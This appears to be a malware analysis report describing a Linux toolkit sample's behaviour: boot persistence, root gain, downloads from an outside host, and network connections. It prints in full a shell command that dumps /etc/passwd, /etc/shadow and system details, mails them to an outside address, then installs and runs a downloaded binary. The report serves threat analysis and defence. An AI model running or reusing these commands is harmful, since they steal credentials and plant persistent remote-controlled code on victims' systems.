Technical Information
To ensure autorun and distribution:
Creates or modifies the following files:
- /etc/rc.d/init.d/sendmail
Malicious functions:
Gains root privileges
Launches processes:
- sh -c wget www.r3dstorm.com/toolkit/tOOlz.tgz
- wget www.r3dstorm.com/toolkit/tOOlz.tgz
- sh -c wget www.r3dstorm.com/toolkit/hate.you
- wget www.r3dstorm.com/toolkit/hate.you
- sh -c wget www.r3dstorm.com/toolkit/love.you
- wget www.r3dstorm.com/toolkit/love.you
- sh -c wget www.r3dstorm.com/toolkit/daily
- wget www.r3dstorm.com/toolkit/daily
- sh -c wget www.r3dstorm.com/toolkit/mclean
- wget www.r3dstorm.com/toolkit/mclean
- sh -c wget www.r3dstorm.com/toolkit/see_all
- wget www.r3dstorm.com/toolkit/see_all
- sh -c wget www.r3dstorm.com/toolkit/up2date
- wget www.r3dstorm.com/toolkit/up2date
- sh -c wget www.r3dstorm.com/toolkit/day
- wget www.r3dstorm.com/toolkit/day
- sh -c wget www.r3dstorm.com/toolkit/READ.1st
- wget www.r3dstorm.com/toolkit/READ.1st
- sh -c wget www.r3dstorm.com/toolkit/lynx.tgz
- wget www.r3dstorm.com/toolkit/lynx.tgz
- sh -c PATH=\"/bin:/sbin\";export PATH;cat /etc/*-release > /tmp/.rdn 2> /dev/null;echo === >> /tmp/.rdn;cat /etc/passwd >> /tmp/.rdn 2> /dev/null;echo === >> /tmp/.rdn;cat /etc/shadow >> /tmp/.rdn 2> /dev/null;echo === >> /tmp/.rdn;ping -c 4 www.yahoo.com >> /tmp/.rdn 2> /dev/null;echo === >> /tmp/.rdn;route >> /tmp/.rdn 2> /dev/null;echo === >> /tmp/.rdn;ifconfig >> /tmp/.rdn 2>/dev/null;echo === >> /tmp/.rdn;hostname -i >> /tmp/.rdn 2>/dev/null;echo == >> /tmp/.rdn;uname -a >> /tmp/.rdn 2>/dev/null;echo == >> /tmp/.rdn;mail -s TooLKiTo2 dezde@mymail.ro < /tmp/.rdn 2>/dev/null;rm -rf /tmp/.rdn 2>/dev/null;mv -f up2date /bin/up2date 2> /dev/null;/bin/up2date 2> /dev/null;echo \"/bin/up2date 2>/dev/null\" >> /etc/rc.d/init.d/sendmail 2>/dev/null
- cat /etc/os-release
- cat /etc/passwd
- cat /etc/shadow
- ping -c 4 www.yahoo.com
- route
- ifconfig
- hostname -i
- uname -a
- rm -rf /tmp/.rdn
- mv -f up2date /bin/up2date
- /bin/up2date
Performs operations with the file system:
Creates or modifies files:
- /tmp/.rdn
Deletes files:
- /tmp/.rdn
Network activity:
Establishes connection:
- <LOCAL_DNS_SERVER>
- 87.###.98.8:1025
DNS ASK:
- ww#.##dstorm.com
- ww#.#ahoo.com
- 8.##.###.87.in-addr.arpa
- 1.###.##8.192.in-addr.arpa
Sends data to the following servers:
- 87.##8.98.8:0